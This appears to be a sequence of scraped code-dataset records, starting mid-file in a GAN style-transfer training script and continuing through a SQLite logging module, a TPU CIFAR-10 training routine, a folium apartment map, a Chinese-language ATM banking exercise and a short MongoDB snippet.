stl_base_model(style_in), stl_base_model(gen_img)\n\n similarity = tf.einsum(\n \"ae,pe->ap\", stl_vec, gen_vec1\n )\n temp = 0.2\n similarity /= temp\n \n cnt_loss = pairWiseRankingLoss(cnt_vec, gen_vec, tf.cast(tf.broadcast_to(1, shape=[cnt_vec.shape[0]]), dtype=tf.bool))\n stl_loss = stlLoss(stly, similarity)\n gen_loss = genLoss(cnt_in, gen_img)\n total_loss = totalLoss(stl_loss,cnt_loss, gen_loss)\n\n grads = gen_tape.gradient(total_loss, gen_model.trainable_variables)\n opt.apply_gradients(zip(grads, gen_model.trainable_variables))\n #stl_metrics.update_state(gen_vec1, stly)\n #cnt_metrics.update_state(cnt_vec, gen_vec, tf.cast(tf.broadcast_to(1, shape=[cnt_vec.shape[0]]), dtype=tf.bool))\n return total_loss, gen_loss, cnt_loss, stl_loss\n\ndef load_pixel_metrics(filename):\n full_mat = np.load(filename)\n style_pixels = (full_mat['style']-127.5)/127.5\n content_pixels = (full_mat['cotent']-127.5)/127.5\n transfer_mat = (full_mat['transfers']-127.5)/127.5\n return style_pixels, content_pixels, transfer_mat\n\ndef generate_samples(dataset, n_samples, patch_shape):\n style, content= dataset.take(n_samples)\n return [cnt_pixels, style_pixels, mat_pixels], y_dc, y_ds\n\ndef generate_fake_samples(g_model, samples, patch_shape):\n cnt_img, style_img = samples\n X = g_model([cnt_img, style_img])\n y_dc = zeros((len(X), patch_shape, patch_shape, 1))\n 
y_ds = zeros((len(X)))\n return X, y_dc, y_ds\n\ndef summarize_performance(step, g_model, dataset, n_samples=3):\n cnt_sample, stl_sample = dataset\n gen_sample = g_model([cnt_sample, stl_sample])\n #rescale pixels values\n X_cnt = (cnt_sample+1)/2\n X_stl = (stl_sample+1)/2\n X_trn = (gen_sample+1)/2\n # plot samples\n for i in range(n_samples):\n pyplot.subplot(3, n_samples, 1 + i)\n pyplot.axis('off')\n pyplot.imshow(X_cnt[i])\n for i in range(n_samples):\n pyplot.subplot(3, n_samples, 1 + n_samples + i)\n pyplot.axis('off')\n pyplot.imshow(X_stl[i])\n for i in range(n_samples):\n pyplot.subplot(3, n_samples, 1 + 2*n_samples + i)\n pyplot.axis('off')\n pyplot.imshow(X_trn[i])\n # save result image \n filename = f'plot_s{step+1}.png'\n pyplot.savefig(os.path.join(config.GAN_LOG_DIR,filename))\n pyplot.close()\n # save model checkpoint\n # if step % 100:\n # model_filename = f'model_{step+1}.h5'\n # g_model.save(os.path.join(config.GAN_LOG_DIR,model_filename))\n # logger.info(f\">> Saved : {model_filename} \")\n\n\ndef train(epochs=3):\n #tensorboard_callback.set_model(desc_pre_model)\n plotlosses = PlotLosses(outputs=[MatplotlibPlot()], groups={'loss' : ['total_loss', 'gen_loss', 'stl_loss', 'cnt_loss']})\n for epoch in range(epochs):\n start_time = time.time()\n \n # Iterate over the batches of the dataset.\n for step, (style_batch, cnt_batch, stly_batch) in enumerate(train_dataset):\n total_loss, gen_loss, cnt_loss, stl_loss = train_step(cnt_batch, style_batch, stly_batch)\n\n # Run a validation loop at the end of each epoch.\n # for x_batch_val, y_batch_val in val_dataset:\n # val_loss = val_step(x_batch_val, y_batch_val)\n\n #stl_acc = stl_metrics.result()\n #cnt_acc = cnt_metrics.result()\n plotlosses.update({\n 'total_loss' : total_loss,\n 'gen_loss' : gen_loss,\n 'stl_loss' : stl_loss,\n 'cnt_loss' : cnt_loss\n #'stl_acc' : stl_acc,\n #'cnt_acc' : cnt_acc\n })\n plotlosses.send()\n\n #stl_metrics.reset_states()\n #cnt_metrics.reset_states()\n # val_acc = val_metrics.result()\n # val_metrics.reset_states()\n # print(\"Validation acc: %.4f\" % (float(val_acc),))\n print(\"Time taken: %.2fs\" % (time.time() - start_time))\n summarize_performance(epoch, gen_model, [cnt_batch, style_batch], 5)\n\n\n# def train(g_model, dataset, n_epoch=100, batch_size=16):\n# n_patch = dc_model.output_shape[1]\n# batch_per_epoch = (dataset[1].shape[0]*(dataset[1].shape[1]//2))//batch_size\n# n_steps = n_epoch*batch_per_epoch\n# plotlosses = PlotLosses(outputs=[MatplotlibPlot()], groups={'dss model' : ['dss_loss'], 'dsc model' : ['dsc_loss'], 'gan model' : ['gen_loss']})\n\n# save_interval = 10\n# log_interval = 1\n\n# for i in range(n_steps):\n# [X_cnt, X_stl, X_trn], ydc_real, yds_real = generate_real_samples(dataset, batch_size, n_patch)\n# X_fake_trn, ydc_fake, yds_fake = generate_fake_samples(g_model, [X_cnt, X_stl], n_patch)\n# # train style descriminator\n# usXds_stl = np.concatenate((X_stl, X_stl))\n# usXds_trn = np.concatenate((X_trn, X_fake_trn))\n# usysd = np.concatenate((yds_real, yds_fake))\n# Xds_stl, Xds_trn, yds = shuffle(usXds_stl, usXds_trn, usysd)\n# #train content descriminator\n# usXdc_cnt = np.concatenate((X_cnt, X_cnt))\n# usXdc_trn = np.concatenate((X_trn, X_fake_trn))\n# usydc = np.concatenate((ydc_real, ydc_fake))\n# Xdc_cnt, Xdc_trn, ydc = shuffle(usXdc_cnt, usXdc_trn, usydc)\n\n# #train GAN model\n# gen_loss, dc_loss, ds_loss = train_step(X_cnt, X_stl, X_trn, ydc_fake, yds_fake, Xds_stl, Xds_trn, yds, Xdc_cnt, Xdc_trn, ydc)\n \n\n# #logger.info(f'[{i}/{n_steps}] : style 
descriminator total loss : {ds_loss} \\n content descriminator total loss : {dc_loss} \\n GAN total loss : {gan_total_loss} | GAN dss loss : {gan_dss_loss} | GAN dsc loss : {gan_dsc_loss}')\n# if i % 10 == 0: \n# plotlosses.update({\n# 'dss_loss' : ds_loss,\n# 'dsc_loss' : dc_loss,\n# 'gen_loss' : gen_loss,\n# })\n# plotlosses.send()\n# if (i+1) % (batch_per_epoch*save_interval) == 0:\n# summarize_performance(i, g_model, dataset)\n# if i % 100 == 0:\n# summarize_performance(i, g_model, dataset)\n# if i == config.GAN_BP:\n# break\n\n#%%\nif __name__ == \"__main__\":\n #load dataset\n stenc_df = pd.read_csv('./data/data/styleU/StyleEnc.csv', index_col=0)\n train_path = pathlib.Path(os.path.join(config.DESC_ROOT_DIR,'train'))\n train_ds = tf.data.Dataset.from_generator(\n train_gen,\n output_signature=(\n tf.TensorSpec(shape=(128,128, 3), dtype=tf.float32),\n tf.TensorSpec(shape=(128,128,3), dtype=tf.float32),\n tf.TensorSpec(shape=(), dtype=tf.int32)\n )\n\n )\n train_dataset = prepare(train_ds, shuffle=True)\n\n cnt_model_dir = \"./data/models/descc_wgt4.h5\"\n stl_model_dir = \"./data/models/descs_wgt7.h5\"\n stl_base_model = stl_encoder(config.DESCS_LATENT_SIZE, config.IMAGE_SHAPE)\n stl_base_model.load_weights(stl_model_dir)\n cnt_base_model = define_cnt_encoder(config.DESCC_LATENT_SIZE, config.IMAGE_SHAPE)\n cnt_base_model.load_weights(cnt_model_dir)\n\n gen_model = define_generator(cnt_base_model, stl_base_model)\n\n train_steps = 100\n lr_fn = tf.optimizers.schedules.PolynomialDecay(1e-4, train_steps, 1e-5, 2)\n opt = tf.optimizers.Adam(lr_fn)\n\n #stl_metrics = MarginalAcc()\n stlLoss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n genLoss = tf.keras.losses.MeanAbsoluteError()\n #stl_metrics = tf.keras.metrics.MeanAbsoluteError()\n #cnt_metrics = MarginalAcc()\n #train model\n train(config.GAN_EPOCHS)\n\n# %%\n","sub_path":"gen_model_train1.py","file_name":"gen_model_train1.py","file_ext":"py","file_size_in_byte":13505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208135972","text":"import sqlite3 as db\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# conn 함수 : Conn\r\n# disconn 함수 : DisConn\r\n# insert 함수 : InsertLog\r\n# select 함수 : SelectLog\r\n\r\n# 광고 시청자 정보 : avgPeople\r\n# 광고 시청자 정보\r\n\r\nglobal conn\r\nglobal c\r\n\r\n#path = './DaFarm/testDB.sqlite'\r\n\r\n# conn 함수\r\ndef Conn(path) :\r\n global conn\r\n global c\r\n conn = db.connect(path)\r\n c = conn.cursor()\r\n\r\n# disconn 함수\r\ndef DisConn() :\r\n global conn\r\n global c\r\n c.close()\r\n conn.close()\r\n\r\n# insert 함수\r\n'''Sex 성별 / Age 나이 / Watch 응시시간 / Time 시간 : PK / Station 역이름 / AD_ID 광고ID'''\r\ndef InsertLog(arg_list) :\r\n global conn\r\n global c\r\n \r\n age = arg_list[1]\r\n if 0 <= age < 10:\r\n age = '09'\r\n elif 10 <= age < 20:\r\n age = '1019'\r\n elif 20 <= age < 40:\r\n age = '2039'\r\n elif 40 <= age < 60:\r\n age = '4059'\r\n elif 60 <= age:\r\n age = '60'\r\n else:\r\n age = '100'\r\n\r\n sql_command = 'INSERT INTO AD_LOG VALUES(' + '\"' + str(arg_list[0]) + '\"' \\\r\n ', \"' + str(arg_list[1]) + '\"' \\\r\n ', \"' + str(arg_list[2]) + '\"' \\\r\n ',STRFTIME(\"%Y%m%d%H%M%f\", \"NOW\", \"LOCALTIME\")' \\\r\n ', \"' + str(arg_list[3]) + '\"' \\\r\n ', \"' + str(arg_list[4]) + '\");'\r\n\r\n c.execute(sql_command)\r\n conn.commit()\r\n print(\"AD_ID : {}, Station : {}, Sex : {}, Age : {} insert commit !!\".format(arg_list[4], arg_list[3], arg_list[0], arg_list[1]))\r\n\r\n# select 함수\r\ndef SelectLog(subNm, 
orderBy) :\r\n global conn\r\n global c\r\n order_sql = ''\r\n search_key = ''\r\n cnt = 0\r\n\r\n for i in subNm :\r\n cnt += 1\r\n if(cnt == 1) :\r\n search_key += '\"' + i + '\"'\r\n else :\r\n search_key += ', \"' + i + '\"'\r\n\r\n sql_command = 'SELECT Time' \\\r\n ' ,Sex' \\\r\n ' ,Age' \\\r\n ' ,Watch' \\\r\n ' ,Station' \\\r\n ' ,AD_ID ' \\\r\n ' FROM AD_LOG ' \\\r\n 'WHERE Station IN ('+ search_key +')'\r\n if orderBy == 0 : # 오름차순\r\n order_sql = ' ORDER BY TIME ASC'\r\n else : # 내림차순\r\n order_sql = ' ORDER BY TIME DESC'\r\n\r\n sql_command += order_sql\r\n\r\n print(sql_command)\r\n c.execute(sql_command)\r\n res = c.fetchall()\r\n if(res != None) :\r\n for i in res :\r\n print(i)\r\n\r\n\r\ndef avgPeople(df):\r\n df_pi = pd.crosstab(df['frameId'], df['gender'])\r\n df_pi['gender'] = df_pi['F'] < df_pi['M'] # True = M, False = F\r\n df_pi.drop(['F', 'M'], axis=1, inplace=True)\r\n\r\n df_gp = df.groupby(['frameId']).mean()\r\n df_gp.drop(['eyetime'], axis=1, inplace=True)\r\n\r\n df_gaze = df.groupby(['frameId', 'subNM']).sum()\r\n df_gaze.reset_index(inplace=True)\r\n df_gaze.drop(['age', 'AD_ID', 'frameId'], axis=1, inplace=True)\r\n\r\n result = pd.concat([df_pi, df_gp, df_gaze], axis=1, join_axes=[df_pi.index])\r\n result.reset_index(inplace=True)\r\n\r\n data_cnt = len(result)\r\n arg_list = list()\r\n\r\n if data_cnt > 0:\r\n for id_cnt in range(0, data_cnt):\r\n\r\n gender = ''\r\n age = ''\r\n\r\n if result.loc[id_cnt, 'gender']:\r\n gender = 'M'\r\n else:\r\n gender = 'F'\r\n\r\n if 0 <= result.loc[id_cnt, 'age'] < 10:\r\n age = '09'\r\n elif 10 <= result.loc[id_cnt, 'age'] < 20:\r\n age = '1019'\r\n elif 20 <= result.loc[id_cnt, 'age'] < 40:\r\n age = '2039'\r\n elif 40 <= result.loc[id_cnt, 'age'] < 60:\r\n age = '4059'\r\n elif 60 <= result.loc[id_cnt, 'age']:\r\n age = '60'\r\n else:\r\n age = '100'\r\n\r\n arg_list.append([gender\r\n , str(age)\r\n , str(result.loc[id_cnt, 'eyetime'])\r\n , result.loc[id_cnt, 'subNM']\r\n , str(result.loc[id_cnt, 'AD_ID'])])\r\n\r\n Conn()\r\n for arg in arg_list:\r\n # print(arg)\r\n InsertLog(arg)\r\n DisConn()\r\n\r\n return 0\r\n","sub_path":"dbConn.py","file_name":"dbConn.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66967674","text":"import torch\nfrom torch import nn\nimport torch_xla\nimport torch_xla.core.xla_model as xm\nimport torch_xla.distributed.xla_multiprocessing as xmp\nimport torch_xla.distributed.parallel_loader as pl\nfrom torchvision import transforms\n\nfrom projectcode.datasets.cifar10 import CifarDataset\nimport search.cifar10_search as my_cifar10\nimport datetime\nfrom misc.flops_counter import add_flops_counting_methods\nimport os\nimport numpy as np\nfrom collections import Callable\nfrom loguru import logger\nfrom misc.utils import Cutout\nimport argparse\n\n# import torch_optimizer as optim\n\nfrom projectcode.training.optim import Lamb\n\n\ndef get_map_fn(\n model: torch.nn.Module,\n train_params: dict,\n data_root: str,\n momentum: float,\n weight_decay: float,\n CIFAR_CLASSES: int,\n learning_rate: float,\n layers: int,\n batch_size: int,\n epochs: int,\n drop_path_prob: float = 0.0,\n save_pth: str = \"\",\n args: argparse.Namespace = None,\n WRAPPED_MODEL= None,\n clip = None,\n\n) -> Callable:\n \"\"\"\n Defines the distributed training function. Must run before training each individual to generate the\n training function for the individual. 
Also evaluates the individual and saves the results in a .pt file.\n\n TODO: Refactor as a class\n TODO: Fix the parameters by consolidating them, possibly via the args\n\n Args:\n model:\n train_params:\n data_root:\n momentum:\n weight_decay:\n CIFAR_CLASSES:\n learning_rate:\n layers:\n batch_size:\n epochs:\n drop_path_prob:\n save_pth: not actually used\n\n Returns:\n A function to be executed via\n FLAGS = {}\n xmp.spawn(map_fn, args=(FLAGS,), nprocs=8, start_method='fork')\n\n \"\"\"\n params = train_params\n # WRAPPED_MODEL = xmp.MpModelWrapper(model)\n\n def train(\n train_queue: pl.ParallelLoader,\n net: torch.nn.Module,\n criterion: Callable,\n optimizer: torch.optim.Optimizer,\n params: dict,\n device: torch.device,\n ):\n \"\"\"\n Training loop for a network.\n\n Args:\n train_queue:\n net:\n criterion:\n optimizer:\n params:\n device: pass the automatically assigned device via xm.spawn\n\n Returns:\n num correct, total loss, total num examples\n \"\"\"\n\n net.train()\n train_loss = 0\n correct = 0\n total = 0\n\n for step, (inputs, targets) in enumerate(train_queue):\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs, outputs_aux = net(inputs)\n loss = criterion(outputs, targets)\n\n loss.backward()\n nn.utils.clip_grad_norm_(net.parameters(), params[\"grad_clip\"])\n\n xm.optimizer_step(optimizer)\n\n net.apply(clip)\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n return correct, train_loss, total\n\n def infer(\n valid_queue: pl.ParallelLoader,\n net: torch.nn.Module,\n criterion: Callable,\n device: torch.device,\n ):\n \"\"\"\n Evaluation loop for a network.\n\n Args:\n valid_queue:\n net:\n criterion:\n device: pass the automatically assigned device via xm.spawn\n\n Returns:\n mean accuracy, mean loss\n \"\"\"\n\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n\n with torch.no_grad():\n for step, (inputs, targets) in enumerate(valid_queue):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs, _ = net(inputs)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n\n acc = 100.0 * correct / total\n\n return acc, test_loss / total\n\n def run():\n \"\"\"\n Main function to setup the training loop and evaluation loop.\n See comments for detailed explanation.\n\n Returns:\n None, but it saves the model weights and model performance, based on the get_map_fn arguments\n\n \"\"\"\n\n # xla will assign a device for each forked run of this function\n device = xm.xla_device()\n\n # determine if this fork is the master fork to avoid logging and print 8 times\n master = xm.is_master_ordinal()\n\n if master:\n logger.info(\"running at batch size %i\" % batch_size)\n\n criterion = nn.CrossEntropyLoss()\n\n criterion.to(device)\n model = WRAPPED_MODEL.to(device)\n\n # standard data prep\n CIFAR_MEAN = [0.49139968, 0.48215827, 0.44653124]\n CIFAR_STD = [0.24703233, 0.24348505, 0.26158768]\n\n train_transform = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.RandomCrop(32),\n transforms.RandomHorizontalFlip(),\n transforms.Normalize(CIFAR_MEAN, CIFAR_STD),\n ]\n )\n\n if args.cutout > 0:\n train_transform.transforms.append(Cutout(args.cutout))\n\n train_data = CifarDataset(transform=train_transform)\n\n # distributed samples ensure data is sharded to each tpu core\n # if you do not use this, you are 
only using 1 of the 8 cores\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_data,\n num_replicas=xm.xrt_world_size(),\n rank=xm.get_ordinal(),\n shuffle=True,\n )\n\n train_queue = torch.utils.data.DataLoader(\n train_data,\n batch_size=batch_size//xm.xrt_world_size(),\n sampler=train_sampler,\n drop_last=True,\n num_workers=0,\n )\n\n valid_transform = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize(CIFAR_MEAN, CIFAR_STD),\n ]\n )\n\n valid_data = my_cifar10.CIFAR10(\n root=data_root, train=False, download=False, transform=valid_transform\n )\n\n valid_sampler = torch.utils.data.distributed.DistributedSampler(\n valid_data,\n num_replicas=xm.xrt_world_size(),\n rank=xm.get_ordinal(),\n shuffle=False,\n )\n\n valid_queue = torch.utils.data.DataLoader(\n valid_data,\n sampler=valid_sampler,\n batch_size=batch_size//xm.xrt_world_size(),\n drop_last=True,\n num_workers=0,\n )\n\n # standard optimizer stuff\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n\n if args.opt == \"sgd\":\n\n optimizer = torch.optim.SGD(\n parameters,\n args.learning_rate,\n momentum=momentum,\n weight_decay=args.weight_decay,\n )\n elif args.opt == \"lamb\":\n optimizer = Lamb(\n parameters, lr=args.learning_rate, weight_decay=weight_decay\n )\n else:\n raise NameError(\"Unknown Optimizer %s\" % args.opt)\n\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, int(epochs))\n\n # training by epoch loop\n for epoch in range(epochs):\n\n # the model needs a droprate, so just assign it\n model.droprate = drop_path_prob * epoch / epochs\n\n start = datetime.datetime.now()\n st = start.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n if master:\n logger.info(\"starting epoch %i at %s\" % (epoch, st))\n\n # parallel loader necessary to load data in parallel to each core\n para_loader = pl.ParallelLoader(train_queue, [device]).per_device_loader(\n device\n )\n correct, train_loss, total = train(\n para_loader, model, criterion, optimizer, params, device\n )\n\n train_acc = 100 * correct / total\n\n # collect the train accuracies from all cores\n train_acc = xm.mesh_reduce(\"avg acc\", train_acc, np.mean)\n\n end = datetime.datetime.now()\n duration = (end - start).total_seconds()\n\n if master:\n logger.info(\"train_acc %f duration %f\" % (train_acc, duration))\n\n scheduler.step()\n\n # validate using 8 cores and collect results\n valid_acc, valid_obj = infer(valid_queue, model, criterion, device)\n valid_acc = xm.mesh_reduce(\"val avg acc\", valid_acc, np.mean)\n\n if master:\n logger.info(\"valid_acc %f\" % valid_acc)\n\n # count flops\n _ = add_flops_counting_methods(model)\n model.eval()\n model.start_flops_count()\n random_data = torch.randn(1, 3, 32, 32)\n model(torch.autograd.Variable(random_data).to(device))\n n_flops = np.round(model.compute_average_flops_cost() / 1e6, 4)\n n_flops = xm.mesh_reduce(\"flops\", n_flops, np.mean)\n\n if master:\n logger.info(\"flops %f\" % n_flops)\n\n if master:\n logger.info(\"saving\")\n\n # save weights and results\n\n xm.save([valid_acc, n_flops], \"results.pt\")\n\n def mp_fn(rank, flags):\n torch.set_default_tensor_type(\"torch.FloatTensor\")\n run()\n\n return mp_fn\n","sub_path":"projectcode/training/tpu.py","file_name":"tpu.py","file_ext":"py","file_size_in_byte":9553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"132286844","text":"import pandas as pd\r\nimport folium\r\nfrom folium.plugins import MarkerCluster, Search, MiniMap\r\nfrom folium 
import IFrame\r\nimport os\r\ndata2 = pd.read_csv('blore_apartment_data.csv')\r\ndata1 = pd.read_csv('apartment_data.csv')\r\ndata1 = data1.drop(columns=\"geometry\")\r\ndata1['combined'] = list(zip(data1.lat, data1.lon))\r\nmax_records = 1125\r\nBAN_COORDINATES = (12.9716, 77.5946)\r\nmap1 = folium.Map(location=BAN_COORDINATES, zoom_start=12, max_zoom = 16)\r\nbangalore = os.path.join('bbmp.json')\r\nmap = MarkerCluster(control = False).add_to(map1)\r\nfor i in data1[0:max_records].iterrows():\r\n text = '
' + i[1]['names'] + '
'\r\n data3 = data2[data2.namesfull == i[1]['names']].loc[:, ['Price', 'Area', 'UnitType']]\r\n html = text + data3.to_html(classes=\"table table-striped table-hover table condensed table-responsive\",index=False)\r\n folium.Marker(\r\n popup = folium.Popup(html, max_width = 400),\r\n location = [i[1]['lat'],i[1]['lon']]\r\n ).add_to(map)\r\nbanglore_geo = folium.GeoJson(bangalore, name='bangalore',\r\n tooltip= folium.features.GeoJsonTooltip(fields= ['WARD_NAME', 'WARD_NO'],\r\n aliases= ['ward name','ward no'],\r\n labels=True,\r\n sticky=True\r\n )).add_to(map1)\r\nward_search = Search(layer=banglore_geo,\r\n geom_type='Polygon',\r\n placeholder='Search for banglore wards',\r\n collapsed=False,\r\n search_label='WARD_NAME'\r\n ).add_to(map1)\r\nward_no_search = Search(layer=banglore_geo,\r\n geom_type='Polygon',\r\n placeholder='Search for banglore ward_no',\r\n collapsed=False,\r\n search_label='WARD_NO',\r\n position = 'bottomright'\r\n ).add_to(map1)\r\nminimap = MiniMap(toggle_display=True,\r\n height = 200,\r\n width = 200,\r\n minimized = True\r\n )\r\n#t = Terminator()\r\n#map1.add_child(t)\r\nminimap.add_to(map1)\r\nfolium.LayerControl().add_to(map1)\r\n","sub_path":"test-project.py","file_name":"test-project.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129536729","text":"# -*-coding:utf-8-*-\n# __author__ = \"Morn\"\n# Date:2018/10/18\nimport os\nfrom time import sleep\nfrom prettytable import PrettyTable\nfrom prettytable import PLAIN_COLUMNS\nfrom atm.core import auth\nfrom atm.core import accounts\nfrom atm.core import get_base_dir\nfrom atm.core.manager import *\nmenu = \"\"\"\n ----------- Bank System -----------\n 1.账户信息\n 2.还款\n 3.取款\n 4.提现\n 5.转账\n 6.账单\n 7.管理\n q.退出\n \"\"\"\nuser = \"root\"\naccess_logger = logger.get_logger('access.log')\n\n\n@auth.login\ndef display():\n items_dic = {'id': '账户名', 'account': '账户余额', 'credit': '剩余额度', 'cre_line': '信用额度',\n 'expire_date': '过期时间'}\n get_accounts = accounts.get_accounts(user, *items_dic.keys())\n table = PrettyTable(['field1', 'field2']) # 表格输出用户信息\n table.set_style(PLAIN_COLUMNS)\n table.header = False\n table.align['field1'] = 'l'\n table.align['field2'] = 'l'\n for key in items_dic:\n cell = [items_dic[key], get_accounts[key]]\n table.add_row(cell)\n print(table)\n access_logger.info(\"%s 查看了自己的账户信息\" % user)\n sleep(2)\n\n\n@auth.login\ndef repay():\n while True:\n ret = draw_repay('repay')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n elif ret == 'clear':\n return\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= get_accounts['account']:\n if get_accounts['credit'] + user_input <= get_accounts['cre_line']:\n balance = get_accounts['account'] - user_input\n credit = get_accounts['credit'] + user_input\n accounts.set_accounts(user, account=balance, credit=credit)\n print(\"还款成功,您当前的余额为: \" + str(balance) + \" , 信用额度: \"\n + str(credit))\n print(\"3s后返回菜单\")\n sleep(3)\n else:\n print(\"您还款的金额大于您应还的金额,我们会将多余部分退到您的账户\")\n balance = get_accounts['account'] - (get_accounts['cre_line'] -\n get_accounts['credit'])\n credit = get_accounts['cre_line']\n accounts.set_accounts(user, account=balance, credit=credit)\n print(\"还款成功,您当前的余额为: \" + str(balance) + \" , 信用额度: \"\n + str(credit))\n print(\"3s后返回菜单\")\n sleep(3)\n access_logger.info(\"%s 执行了还款操作,还款金额: %s ,余额: %s,信用额度: %s。\" %\n (user, user_input, balance, credit))\n break\n else:\n print(\"对不起,还款金额大于当前账户余额,当前账户余额: \" +\n 
str(get_accounts['account']))\n continue\n\n\ndef draw_repay(business): # draw, withdraw,\n business_dic = {'repay': '还款', 'draw': '取款', 'withdraw': '提现', 'transfer': '转账'}\n get_accounts = accounts.get_accounts(user, 'account', 'credit', 'cre_line')\n if business == 'draw' or business == 'transfer':\n print(\"您好, \" + user + \", 您当前的用户余额: \" + str(get_accounts['account']))\n elif business == 'withdraw':\n print(\"您好, \" + user + \", 您当前的用户余额: \" + str(get_accounts['account'])\n + \", 信用额度: \" + str(get_accounts['credit']))\n elif business == 'repay':\n if get_accounts['credit'] == get_accounts['cre_line']:\n print(\"恭喜你,没有需要偿还的款项\")\n return 'clear'\n print(\"您好, \" + user + \", 您当前的用户余额: \" + str(get_accounts['account'])\n + \", 需要还款金额: \" + str(get_accounts['cre_line'] - get_accounts['credit']))\n user_input = input(\"请输入%s金额[b:返回]:\" % business_dic[business])\n if user_input == 'b':\n return 'b'\n elif user_input == 'q':\n exit('byebye'.center(30, '-'))\n elif not user_input.isdigit():\n print('抱歉,错误输入,无法识别')\n return 'error'\n user_input = int(user_input)\n if user_input < 0:\n input('%s金额不能为负' % business_dic[business])\n return 'error'\n return user_input, get_accounts\n\n\n@auth.login\ndef draw(): # 扣除账户余额\n while True:\n ret = draw_repay('draw')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= get_accounts['account']:\n balance = get_accounts['account'] - user_input\n accounts.set_accounts(user, account=balance)\n print(\"取款成功,您当前的余额为: \" + str(balance))\n print(\"3s后返回菜单\")\n access_logger.info(\"%s 执行了取款操作。\" % user)\n sleep(3)\n break\n else:\n print(\"对不起,取款金额大于当前账户余额,当前账户余额: \" +\n str(get_accounts['account']))\n continue\n\n\n@auth.login\ndef withdraw():\n while True:\n ret = draw_repay('draw')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= get_accounts['credit']:\n credit = get_accounts['credit'] - user_input * (1 + 0.05)\n balance = get_accounts['account'] + user_input\n accounts.set_accounts(user, account=balance, credit=credit)\n print(\"提现成功,您当前的余额为: \" + str(balance) + \" , 当前的信用\"\n \"额度为: \" + str(credit))\n access_logger.info(\"%s 执行了提现操作,提现金额: %s,剩余额度: %s。\" % (user, user_input, credit))\n print(\"3s后返回菜单\")\n sleep(3)\n break\n else:\n print(\"对不起,提现金额大于当前账户信用额度,当前账户信用额度: \" +\n str(get_accounts['credit']))\n continue\n\n\n@auth.login\ndef transfer():\n while True:\n transfer_id_1 = input(\"请输入转账账号[暂不支持跨行转账] : \")\n transfer_id_2 = input(\"请再次输入转账账号 : \")\n if transfer_id_1.lower() == 'q' or transfer_id_2.lower() == 'q':\n return\n if transfer_id_1 != transfer_id_2:\n print(\"两次输入账号不一致,请核对后再次输入\")\n continue\n transfer_id = transfer_id_1\n base_dir = get_base_dir.get_base_dir()\n transfer_path = base_dir + r\"\\atm\\account\\\\\" + transfer_id + \".json\"\n if not os.path.exists(transfer_path):\n print(\"账户不存在,请核对后再次输入\")\n continue\n user_accounts = accounts.get_accounts(user)\n tar_accounts = accounts.get_accounts(transfer_id)\n ret = draw_repay('transfer')\n if ret == 'b':\n return\n elif ret == 'error':\n continue\n user_input, get_accounts = ret[0], ret[1]\n if user_input <= user_accounts['account']:\n user_balance = user_accounts['account'] - user_input\n accounts.set_accounts(user, account=user_balance)\n tar_balance = tar_accounts['account'] + user_input\n accounts.set_accounts(transfer_id, account=tar_balance)\n print(\"转账成功,您当前的余额为: \" + str(user_balance))\n access_logger.info(\"%s 执行了转账操作, 转账目标账户: %s ,转账金额: 
%s。\" % (user, transfer_id, user_input))\n print(\"3s后返回菜单\")\n sleep(3)\n break\n else:\n print(\"对不起,转账金额大于当前账户余额,当前账户余额: \" +\n str(get_accounts['account']))\n continue\n\n\n@auth.login\ndef bill():\n pass\n\n\n@auth.login\n@auth.authority\ndef manager():\n manager_dic = {'1': 'add_account', '2': 'change_credit', '3': 'frozen_account'}\n while True:\n manager_menu = \"\"\"\n1.添加账户\n2.修改额度\n3.冻结账户\nb.back\nq:quit\n \"\"\"\n print(manager_menu)\n user_input = input(\">>\").strip().lower()\n if user_input == 'q':\n exit('byebye'.center(30, '-'))\n elif user_input == 'b':\n return\n elif user_input in manager_dic.keys():\n eval(manager_dic[user_input])()\n else:\n print(\"无法识别,请重新输入\")\n\n\n@auth.login\ndef run():\n global user\n user = auth.get_user()\n while True:\n print(menu)\n menu_dic = {\n \"1\": \"display\",\n \"2\": \"repay\",\n \"3\": \"draw\",\n \"4\": \"withdraw\",\n \"5\": \"transfer\",\n \"6\": \"bill\",\n \"7\": \"manager\"}\n user_choice = input(\">>\").strip().lower()\n if user_choice == 'q':\n exit('byebye'.center(30, '-'))\n elif user_choice in menu_dic.keys():\n eval(menu_dic[user_choice])()\n else:\n print(\"输入错误\")\n\n\n","sub_path":"atm/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241656716","text":"from pprint import pprint\nfrom pymongo import MongoClient\n\n\nclass Mongo:\n def __init__(self, uri):\n self.client = MongoClient(uri)\n self.db = self.client.crawler\n self.articles = self.db.articles\n\n def print_one(self):\n pprint(self.articles.find_one())\n\n\ndef main():\n articles = Mongo('mongodb://localhost:27017/').articles\n pprint(articles.find_one())\n total = articles.estimated_document_count()\n 